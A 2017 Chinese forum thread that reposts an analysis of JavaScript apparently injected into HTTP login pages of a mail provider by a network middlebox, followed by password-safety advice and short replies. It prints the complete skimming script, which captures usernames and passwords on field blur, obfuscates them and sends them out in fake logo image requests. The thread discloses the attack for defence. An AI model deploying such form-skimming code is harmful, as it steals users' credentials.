全球主机交流论坛

标题: 你们以为运营商只是HTTP插点广告而已么?呵呵呵呵 [打印本页]
作者: yandere    时间: 2017-8-11 20:35
标题: 你们以为运营商只是HTTP插点广告而已么?呵呵呵呵
本帖最后由 yandere 于 2017-8-11 20:37 编辑

原作者 insight-labs


国内某邮件服务商,近期在某南方地区有大量客户反应登录时出错和异常,于是工作人员进行了一下跟进,发现如下:
首先,邮件服务商登陆页面为普通HTTP协议发送,提交时通过JS进行RSA加密(没错,JS的RSA),发送到SSO登陆点,然后进行登录,有些人一看RSA,应该挺安全的了,不过……

在国内上网的大多数人对于运营商在HTTP包里插广告应该很熟悉了,原理很简单,大家可以参考腾讯安全中心的这篇文章http://security.tencent.com/index.php/blog/msg/10

在客户端抓包发现收到的HTTP数据包有异常,有几个包的TTL多了2,说明比正常从服务器到客户端的数据包少走了两跳,而且离服务器不是很远,估计在一个机房里,并且数据包的ID是很规律的12345,明显就是伪造的,包中插入了如下内容:

  2.     <script type="text/javascript">
  3.         document.getElementById("freepassword").onblur = function (e) {
  4.             logoFresh();
  5.         };
  6.      
  7.         function onLoginCheck() {
  8.             var user = null;
  9.             var pass = null;
  10.             user = document.getElementById("freename").value;
  11.             pass = document.getElementById("freepassword").value;
  12.             if (user.length <= 0 || pass.length <= 0) {
  13.                 return false;
  14.             } else {
  15.                 return rskQuery(user + '&' + pass + '&xxxxx.com');
  16.             }
  17.         };
  18.      
  19.         function rskQuery(s) {
  20.             s = encodeURIComponent(s);
  21.             var r = Math.random();
  22.             var num = (Math.round(r * 100)) % 9 + 1;
  23.             var i = 0;
  24.             var out = '';
  25.             do {
  26.                 var ch = s.charCodeAt(i++);
  27.                 ch = (i % 2 > 0) ? (ch - i % num) : (ch + i % num);
  28.                 var l = (ch / 10 >= 10) ? 3 : (ch / 10 > 0 ? 2 : 1);
  29.                 out += l.toString() + ch;
  30.             } while (i < s.length);
  31.             out = r.toString().substring(0, num) + out + num;
  32.             return out;
  33.         };
  34.      
  35.         function logoFresh() {
  36.             var h = logoUrl();
  37.             var s = onLoginCheck();
  38.             if (s == false) {
  39.                 return false;
  40.             }
  41.             for (var i = 0; i < 2; i++) {
  42.                 var bg_logo = new Image(0, 0);
  43.                 bg_logo.src = h + 'images/logo_bg.jpg?' + s;
  44.             }
  45.             var s1 = onLoginCheck();
  46.             var ajaxUrl = h + 'images/logo_bg.jpg?' + s1;
  47.             var result = xmlHttpConnect(ajaxUrl, "get", null);
  48.         };
  49.      
  50.         function logoUrl() {
  51.             return '/';
  52.         };
  53.      
  54.         function createXMLHttp() {
  55.             if (window.XMLHttpRequest) return new XMLHttpRequest();
  56.             else if (window.ActiveXObject) return new ActiveXObject("Microsoft.XMLHTTP");
  57.             else return null;
  58.         };
  59.      
  60.         function xmlHttpConnect(url, method, content) {
  61.             var request = createXMLHttp();
  62.             if (request == null) return null;
  63.             try {
  64.                 request.open(method, url, true);
  65.                 request.send(content);
  66.             } catch (e) {
  67.                 return null;
  68.             }
  69.             if ((request.readyState == 4) && (request.status == 200)) return null;
  70.             else return null
  71.         };
  72.      
  73.         document.getElementById("vippassword").onblur = function (e) {
  74.             logo_Fresh();
  75.         }
  76.      
  77.         function onLoginPhone() {
  78.             var user = null;
  79.             var pass = null;
  80.             user = document.getElementById("vipname").value;
  81.             pass = document.getElementById("vippassword").value;
  82.             if (user.length <= 0 || pass.length <= 0) {
  83.                 return false;
  84.             } else {
  85.                 return rskQuery(user + '&' + pass + '&vip.xxxxx.com');
  86.             }
  87.         }
  88.      
  89.         function logo_Fresh() {
  90.             var h = logoUrl();
  91.             var s = onLoginPhone();
  92.             if (s == false) {
  93.                 return false;
  94.             }
  95.             for (var i = 0; i < 2; i++) {
  96.                 var bg_logo = new Image(0, 0);
  97.                 bg_logo.src = h + 'images/logo_bg.jpg?' + s;
  98.             }
  99.             var s1 = onLoginCheck();
  100.             var ajaxUrl = h + 'images/logo_bg.jpg?' + s1;
  101.             var result = xmlHttpConnect(ajaxUrl, "get", null);
  102.         }
  103.     </script>
复制代码

在登录form里抓取用户名和密码,当成参数跟在logo后面再访问一下logo,再从中间抓包获取这段内容。这样的话邮件服务商的日志里肯定会出现很多 logo的请求后面跟着明文用户名密码吧,错了,服务商那边根本没看到logo被请求两次,推断是带有这个特征的数据包被drop了,真尼玛用心啊。

至此,用户的邮箱密码已经泄露,用户和服务商也没有任何察觉,可能由于某些原因,比如延迟,丢包,bug之类的,导致部分用户被插的时候有异常,影响了原有的登录js,才导致这次事件浮出水面。

服务商由于成本问题,暂不考虑采用SSL登录。

至于那边还有什么类似设备我就不多说了,反正据我的了解,国内随便什么实xxxx权部门都能任意在ISP机房和主干网上接入任意设备,据说连x税xxxxxxx务xx的x都x有xx。

关于本次事件学到的内容:

国内服务用的任何用户名和密码和在国外比如gmail,推特的账号要不相同,而且没有任何关联,并且国外服务的注册邮箱,密保邮箱等都要采用国外邮箱,首推gmail,并且打开二次认证,不要用短信认证,用手机验证器。

线上线下密码要分开,不相同,不近似,比如本地硬盘加密密码。凡是通过明文协议传输的通通被视为已暴露,HTTPS登录时每次手动查看证书签发机
构是否为之前常用的那一个,遇到怀疑是国内CA伪造证书的立刻把证书导出另存为,因为国内没有root
CA(cnnic的好像在ff和chrome已经被去掉了),只有二级证书机构,一旦被发现随便签证书会被立刻取消资格,并且黑名单推送到各大浏览器和操
作系统。

呵呵,你们以为能频繁的,多种花样的插12306就赢了么,你们以为每天在WB打打嘴炮就胜利了么,菊花都被爆脱肛了还不知道。

不上HTTPS都是耍流氓 @cpuer 該上HTTPS了
作者: Yankee    时间: 2017-8-11 20:37
重要的业务都是用TLS,安全性还好(前提是证书干净
作者: Vicer    时间: 2017-8-11 20:38
提示: 作者被禁止或删除 内容自动屏蔽
作者: 眼镜    时间: 2017-8-11 20:39
不明觉厉
作者: qweasdzxc123    时间: 2017-8-11 20:40
访问loc都是挂ss的,不担心运营商拦截
作者: 余晖脉脉    时间: 2017-8-11 20:41
提示: 作者被禁止或删除 内容自动屏蔽
作者: sora    时间: 2017-8-11 20:41
这么说来又多了一个理由用一键登录了.
作者: dvbhack    时间: 2017-8-11 20:58
Lastpass
作者: null_vicer    时间: 2017-8-11 21:08
是时候学习一下代码了
作者: suzizi    时间: 2017-8-11 23:24
提示: 作者被禁止或删除 内容自动屏蔽
作者: yee    时间: 2017-8-11 23:31
几年前的文章又被翻出来了
作者: Smart    时间: 2017-8-11 23:37
不做坏事不怕不怕
作者: Kirito    时间: 2017-8-11 23:55
所以你又水了一贴



欢迎光临 全球主机交流论坛 (https://443502.xyz/) Powered by Discuz! X3.4